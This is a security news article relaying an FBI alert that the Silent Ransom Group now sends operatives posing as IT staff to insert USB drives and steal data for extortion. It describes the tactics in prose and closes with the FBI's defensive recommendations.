The Federal Bureau of Investigation (FBI) has issued a stark warning about a new and alarming tactic employed by the Silent Ransom Group (SRG), a cyber extortion gang that has been active since at least 2022. According to a May 2025 FBI alert, SRG has escalated its attacks by sending operatives in person to victim locations to physically insert USB drives or external hard drives into computers, allowing them to steal sensitive data directly.

SRG, also known as the Silent Ransom Group, initially gained notoriety for targeting law firms in the United States starting in 2023. The group's earlier modus operandi involved sophisticated callback phishing emails and social engineering phone calls, where attackers would pose as representatives offering to help cancel unwanted subscription fees. These phishing emails contained links that, when clicked, downloaded remote access software, giving the attackers a foothold into the victim's network. Once inside, they would quickly exfiltrate data, often without deploying the traditional file-encrypting ransomware that gives the group its name.

The New In-Person Attack Vector

The FBI's latest alert, published as a PDF, details a significant evolution in SRG's attack strategy. The threat actor now directly calls employees of target organizations or sends phishing emails that urge them to contact a number answered by the attacker, who poses as a member of the victim's own IT department. During the ensuing phone call, the attacker instructs the employee to grant remote desktop access to their computer under the guise of troubleshooting a supposed issue related to the phishing email.

However, the most disturbing twist is when this remote access attempt fails. In such cases, SRG dispatches an individual—posing as an IT support technician—to the victim's physical location. This person arrives with a USB drive or external hard drive and tells the employee that they need to "image the device" or "create a backup file" to address potential impacts from the phishing email. The FBI notes that this in-person social engineering is highly effective because it bypasses many digital defenses.

Data Exfiltration Without Ransomware

Once the attacker gains access to the machine—either remotely or by physically inserting a drive—they immediately escalate privileges and begin exfiltrating data. Unlike many ransomware groups, SRG does not typically encrypt files. Instead, they focus on stealing as much sensitive information as possible before issuing an extortion demand. The FBI reports that SRG uses legitimate tools for data exfiltration, such as WinSCP (Windows Secure Copy) or a modified version of Rclone. In some cases, they copy stolen data to internal file-sharing platforms like Google Drive and Microsoft OneDrive, making detection even more difficult.

The group then contacts the victim organization, threatening to sell or publicly release the stolen data unless a ransom is paid. To increase pressure, SRG also contacts the victim's employees and clients, exposing the breach and potentially leaking their personal information. This double-extortion technique has proven highly lucrative for the group.

Why This Tactic Is So Dangerous

The FBI's alert emphasizes that these recent SRG campaigns leave few artifacts on compromised machines. Because the attackers use legitimate system management or remote access tools—tools that are already whitelisted in many corporate environments—traditional antivirus products are unlikely to flag the intrusion. The in-person attack vector adds an additional layer of complexity: physical security teams may not be trained to question a person wearing an IT badge and carrying a laptop bag, especially if the person displays confidence and knowledge of internal procedures.

This tactic represents a convergence of cyber and physical threats. Organizations that have invested heavily in digital defenses—firewalls, endpoint detection, multi-factor authentication—may still be vulnerable if an attacker can simply walk through the front door and plug a USB drive into an unlocked computer. The human element remains the weakest link, as employees are conditioned to trust someone who appears to be from IT.

Background on Silent Ransom Group

Silent Ransom Group emerged in 2022 as a relatively low-profile but effective extortion operation. The group's name is somewhat misleading, as they rarely use ransomware; instead, they focus on data theft and extortion. Cybersecurity researchers have linked SRG to other threat groups, though the exact affiliation remains unclear. The group primarily targets law firms, but has also been observed attacking healthcare, legal, and financial services organizations. The FBI's alert suggests that the group's operators are likely based in Eastern Europe, though attribution is ongoing.

SRG's evolution from simple phishing to in-person infiltration demonstrates a growing trend among sophisticated cybercriminals: they are willing to invest time, money, and personnel to breach high-value targets. The use of USB drives as an attack vector is not new—the infamous Stuxnet worm was spread via USB—but the combination with impersonation of IT support and physical presence makes this a uniquely dangerous campaign.

Recommendations for Defense

The FBI's alert provides a comprehensive list of recommendations for organizations to protect against SRG and similar threats. First and foremost, organizations should verify the credentials of all individuals who request access to company assets, whether remotely or in person. Employees should be trained to independently verify any computer support requests by calling the IT department using a known number, not one provided in an email or phone call.

Technical controls are also critical. Organizations should limit access to sensitive data to only those who need it, following the principle of least privilege. Training employees to recognize phishing attempts—both email and voice—is essential. Establishing clear policies for IT support communications and authentication, such as requiring a unique ticket number for any remote session, can help prevent social engineering attacks.

Data backups remain a vital safety net. All company data should be backed up regularly, with backups stored offline or in an immutable format. Implementing phishing-resistant multi-factor authentication (MFA), such as hardware security keys or biometric verification, can block unauthorized access even if credentials are compromised. Additionally, organizations should block access to commonly exploited ports and disable remote access features unless explicitly needed. Finally, permissions for external drive installation should be disabled on endpoints, preventing unauthorized USB devices from functioning.

The FBI also advises organizations to monitor for unusual use of legitimate tools like Rclone or WinSCP, which SRG uses for data exfiltration. Anomaly detection systems can alert security teams to large outbound data transfers or unusual file access patterns.

This latest SRG campaign is a stark reminder that cybersecurity is not just about digital defenses. Physical security measures—including visitor management, badge systems, and employee awareness—are equally important. As cybercriminals become more creative, organizations must adopt a holistic approach that combines technology, processes, and a security-aware culture to defend against evolving threats like the one described in the FBI's alert.

Source: SecurityWeek News